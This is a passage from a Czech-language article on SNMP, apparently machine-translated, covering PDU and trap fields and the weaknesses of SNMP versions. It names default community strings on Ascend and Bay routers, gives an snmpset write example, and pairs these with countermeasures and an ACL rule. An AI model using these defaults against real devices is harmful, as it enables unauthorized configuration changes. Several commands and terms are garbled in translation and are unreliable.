- 3 (BadValue) - byla zadána neplatná hodnota nebo byla provedena chyba syntaxe při pokusu o nastavení hodnoty;
- 4 (ReadOnly) - byl proveden pokus o změnu proměnné jen pro čtení během požadavku Set;
- 5 (GenErr) - další chyby.
- Index chyb - obsahuje určitý index proměnné, do které chyba patří;
- Pole Vázané proměnné může obsahovat jednu nebo více proměnných (pro požadavky na získání je to jen název proměnných, pro Set - název a hodnotu, která má být nastavena, pro Response - název a požadovanou hodnotu).
Obsah Trap PDU zároveň obsahuje některá další pole (místo hlavičky požadavku):
- Firma - charakterizující výrobce hostitele;
- Typ upozornění na trap může být následující:
- 0 (Coldstart) a 1 (Warmstart) - objekt se vrátí do původního stavu (je mezi nimi nějaký rozdíl, ale co? ..);
- 2 (Linkdown) - rozhraní je vynecháno, zatímco pole proměnné obsahuje dané rozhraní;
- 3 (Linkup) - rozhraní vzrostlo, zatímco pole proměnné obsahuje dotyčné rozhraní;
- 4 (Authenticationfailure) - manažer poslal zprávu s neplatným řetězcem komunity;
- 5 (EGPne Neighborloss) - je pro mě těžké něco říct);
- 6 (Entrprisespecific) - tento typ Trap informuje, že další pole obsahuje typ trapu specializovaný pro tohoto dodavatele.
- Specializovaný typ pastí;
- Časové razítko - obsahuje časové razítko od okamžiku události (není jasné, o čem je toto časové razítko ...).
Protokol SNMP(Simple Network Management Protocol) je navržen tak, aby usnadnil práci správce při správě síťových zařízení. Obrovským problémem SNMP verze 1 (SNMPv1) však vždy byla absolutní nejistota hostitele, na kterém byly spuštěny podpůrné nástroje SNMP. V původní verzi byl použit pouze jeden bezpečnostní mechanismus, založený na použití speciálních hesel nazývaných přístupové řetězce ( komunitní řetězec).
V reakci na stížnosti na bezpečnostní slabiny byla rychle vyvinuta výrazně vylepšená verze SNMP (SNMFV2). Tato verze používá algoritmus hash MD5 k ověřování zpráv mezi servery SNMP a klienty. To vám umožní zajistit jak integritu přenášených dat, tak schopnost ověřit jejich pravost. SNMPv2 navíc umožňuje šifrování přenášených dat. To omezuje schopnost útočníků odposlouchávat síťový provoz a získávat přístupové řetězce. Současně však nic nebrání správcům v používání nejjednodušších hesel na směrovačích.
SNMP verze 3 (SNMPv3) je současný standard a dosahuje požadované úrovně zabezpečení zařízení, ale jeho přijetí bude pravděpodobně na nějakou dobu odloženo. Stačí studovat typickou síť a ujistit se, že většina zařízení běží ani SNMPv2, ale SNMPv1! Další informace o protokolu SNMPv3 naleznete na adrese http://www.ietf.org/html.charters/snmpv3-charter.html. Žádná verze protokolu SNMP však neomezuje možnost administrátorů používat přístupové řetězce poskytované vývojáři. Zpravidla jsou pro ně nastavena snadno uhodlná hesla, která jsou dobře známa všem, kteří se o tyto problémy dokonce mírně zajímají.
Aby toho nebylo málo, v mnoha organizacích je SNMP ve svých bezpečnostních politikách z velké části přehlížen. Možná je to proto, že SNMP běží na vrcholu UDP (které obvykle není v zásobníku protokolů), nebo proto, že o jeho schopnostech ví jen málo správců. V každém případě je třeba poznamenat, že bezpečnostní problémy při používání protokolu SNMP jsou často přehlíženy, což útočníkům často umožňuje proniknout do sítě.
Než se však ponoříme do detailů nedostatků v SNMP, pojďme se rychle podívat na základní pojmy, které s ním přicházejí. Přístupové řetězce mohou být jednoho ze dvou typů - umožňující pouze čtení (typ čtení) a umožňující čtení i zápis (čtení / zápis). S přístupovými řetězci SNMP jen pro čtení můžete zobrazit pouze informace o konfiguraci zařízení, jako je popis systému, připojení TCP a UDP, síťové adaptéry atd. Přístupové řetězce, které poskytují oprávnění ke čtení a zápisu, poskytují správci (a samozřejmě útočníkovi) možnost zapisovat informace do zařízení. Například pomocí jediného příkazu SNMP může správce změnit kontaktní informace o systému, snmpset 10.12.45.2 private.1.3.6.1.2.1.1 s Smith.
Ascend Routery
Ve výchozím nastavení poskytují směrovače Ascend přístup SNMP pomocí veřejných přístupových řetězců (číst číst) a napsat pro čtení a psaní - číst psát). Bezpečnostní chyba související s přístupem pro čtení a zápis SNMP byla poprvé objevena společností Network Associates. Inc.
Protiopatření: Zabezpečení routerů Ascend
Chcete-li změnit výchozí přístupové řetězce na routeru Ascend, jednoduše použijte příkaz nabídky Ethernet ›ModConflg› Možnosti SNMP.
Bay Routery
Směrovače Bay NT ve výchozím nastavení poskytují přístup SNMP, který je uživatelsky řízen pro čtení i zápis. Chcete-li využít této funkce, musíte se pouze pokusit použít výchozí uživatelské jméno Uživatel bez hesla. Na příkazovém řádku routeru zadejte příkaz:
Zobrazit typy komunikace snmp
Tento příkaz umožňuje zobrazit dostupné přístupové řetězce. Kterýkoli uživatel může udělat totéž pomocí správce webu (příkaz nabídky Protokoly ›IP› SNMP ›Komunity).
Protiopatření: Ochrana routerů Bay
V dispečeru Stavbyvedoucí, který je součástí softwaru routerů Bay Networks, vyberte příkaz nabídky Protokoly ›IlP1› SNMPoCommunity... Poté vyberte příkaz Komunita ›Upravit komunitu a změňte přístupové řetězce.
Protiopatření: Ochrana SNMP
Pokud povolujete přístup SNMP přes hraniční bránu firewall jednomu zařízení, ale pro přístup ke zbytku sítě nemusíte používat protokol SNMP, můžete jednoduše přidat příslušná omezení do seznamu ACL routeru.
Seznam přístupových práv 101 odepřít udp jakýkoli protokol eq 161!